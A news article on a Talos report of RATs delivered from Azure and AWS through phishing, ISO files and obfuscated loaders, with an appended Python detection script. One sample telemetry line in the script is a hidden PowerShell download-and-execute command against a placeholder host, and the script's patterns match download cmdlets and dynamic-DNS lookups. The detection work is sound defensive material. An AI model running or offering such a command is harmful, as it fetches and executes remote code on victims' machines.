Azure and AWS suffering from increased abuse of service


A recent campaign harnessing public cloud infrastructure deploys not one but three Remote Access Trojans (RATs). Nanocore, Netwire and AsyncRAT payloads are deployed from public cloud systems, a way for attackers to avoid having to own or manage their own private paid infrastructure, explains Cisco Talos. Attackers otherwise rely on “bulletproof” hosting, which could attract the attention of the police.

This abuse allows cybercriminals to exploit the resources of cloud services run by providers such as Microsoft Azure and Amazon Web Services (AWS) for malicious purposes. “These types of cloud services like Azure and AWS allow attackers to set up their infrastructure and connect to the internet with minimal time or money commitment,” Talos researchers explain. “It also makes it more difficult for the defenders to trace the operations of the attackers.”

On Wednesday, Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer said that a new campaign built on public cloud infrastructure was discovered in October 2021 and that the majority of victims are based in the United States, Canada and Italy. A handful, however, appear to be in Spain and South Korea.

A proven methodology

The attack chain typically begins with a phishing email, often disguised as an invoice. These messages carry .ZIP attachments which, when opened, reveal an ISO image. The ISO file contains a malicious loader for the Trojans in the form of JavaScript, a Windows batch file, or a Visual Basic script.

When a victim loads the disk image, these scripts are triggered. Designed to deploy Nanocore, Netwire, and AsyncRAT, the scripts connect to a download server to grab a payload, and that is where a public cloud service comes in.

The download scripts use obfuscation techniques to disguise this activity. The JavaScript loader contains four layers of obfuscation, each new malicious process being spawned after the previous layer has been peeled away. The batch file contains obscured commands that run PowerShell to retrieve the payload, and the VBScript file also uses PowerShell commands.

Increased vigilance

A PowerShell dropper built with HCrypt has also been detected. The attackers behind this campaign manage a variety of malicious payload hosts, Command and Control (C2) servers, and subdomains. The majority of servers detected so far are hosted on Azure and AWS. “Some of the download servers are running the Apache web server application,” the researchers say. “HTTP servers are configured to allow referencing of open directories that contain variants of NanocoreRATs, Netwire RAT and AsyncRATs malware.”

Additionally, the operators abuse DuckDNS, a legitimate dynamic DNS service for pointing subdomains at IP addresses. This service is used to manage malware downloads through malicious DuckDNS subdomains and to mask the names of C2 hosts, according to Talos. Netwire, Nanocore, and AsyncRAT are popular commercial Trojan strains widely used by attackers to remotely access and hijack vulnerable machines, steal user data, and perform surveillance by means including audio and camera capture.

“Defenders need to monitor traffic to their organization and put in place robust rules around policies for running scripts on their devices,” the researchers commented. “It’s even more important for organizations to improve the security of their email messages, in order to detect and mitigate malicious email messages and break the chain of infection as early as possible.”
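One way to turn the chain described above (a script host launched from a mounted image, PowerShell fetching the payload, lookups of DuckDNS subdomains) into host-level detection logic, as an added Python example that is not from the Talos report or the ZDNet article; the telemetry rows, file names, URL and domains are constructed for illustration:

```python
import re

# Constructed sample telemetry (not from the Talos report): process-creation and DNS events
EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe", "cmdline": r'wscript.exe "E:\invoice_4411.js"'},
    {"type": "process", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.txt')"},
    {"type": "dns", "process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "query": "updates-example.duckdns.org"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"type": "dns", "process": r"C:\Program Files\Mozilla Firefox\firefox.exe", "query": "www.example.com"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}          # JS / VBS / batch launchers
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-e(ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
# Script file executed from a drive other than C:, which is where a mounted ISO typically appears
ISO_SCRIPT_RE = re.compile(r'\b[D-Z]:\\[^"]*?\.(js|vbs|bat)\b', re.I)
DYNDNS_RE = re.compile(r"\.duckdns\.org$", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score(event: dict) -> list:
    """Return the list of reasons an event looks like this loader chain (empty if benign)."""
    reasons = []
    if event["type"] == "process":
        parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
        if image == "powershell.exe" and parent in SCRIPT_HOSTS:
            reasons.append(f"powershell spawned by script host {parent}")
            if DOWNLOAD_RE.search(cmd):
                reasons.append("download cmdlet in command line")
            if HIDDEN_RE.search(cmd):
                reasons.append("hidden window or encoded command")
        elif image in SCRIPT_HOSTS and ISO_SCRIPT_RE.search(cmd):
            reasons.append("script host launched a script from a non-system drive (mounted ISO?)")
    elif event["type"] == "dns" and DYNDNS_RE.search(event["query"]):
        proc = basename(event["process"])
        if proc in SCRIPT_HOSTS or proc == "powershell.exe":
            reasons.append(f"dynamic-DNS lookup {event['query']} by {proc}")
    return reasons


def triage(events: list) -> list:
    """Pair each suspicious event index with its reasons, in telemetry order."""
    return [(i, r) for i, e in enumerate(events) if (r := score(e))]
```

Correlating the three hits on one host (script host from a mounted image, then PowerShell downloading, then a DuckDNS lookup) is what turns individually noisy signals into a confident alert.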

Source: ZDNet.com
